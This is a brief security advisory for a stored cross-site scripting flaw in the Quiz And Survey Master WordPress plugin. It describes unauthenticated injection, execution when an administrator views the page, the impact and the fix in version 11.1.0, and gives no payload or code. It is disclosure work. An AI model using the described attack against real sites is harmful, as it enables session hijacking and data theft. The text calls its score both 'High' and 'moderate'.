CVE-2026-40787

Vulnerability

The Quiz And Survey Master plugin for WordPress versions up to and including 11.0.0 contains an unauthenticated stored Cross-Site Scripting (XSS) vulnerability. An attacker can inject arbitrary JavaScript into the plugin's input fields without requiring authentication. The injected script is stored and later executed when a privileged user (e.g., administrator) views the affected page. [1]

Exploitation

An unauthenticated attacker can craft a malicious payload and submit it via a vulnerable form or field in the plugin. The payload is stored on the server. Successful exploitation requires a privileged user to subsequently access the page containing the injected script, such as by clicking a link or visiting the admin dashboard. No prior authentication is needed for the injection step. [1]

Impact

If exploited, the attacker can execute arbitrary JavaScript in the context of the victim's browser. This can lead to session hijacking, defacement, redirection to malicious sites, or theft of sensitive information. The CVSS score is 7.1 (High), indicating moderate severity with potential for mass exploitation. [1]

Mitigation

The vulnerability is fixed in version 11.1.0 of the plugin. Users are strongly advised to update immediately. For those unable to update, Patchstack offers a mitigation rule to block attacks until the update is applied. The vulnerability is expected to be exploited in mass campaigns, so prompt action is recommended. [1]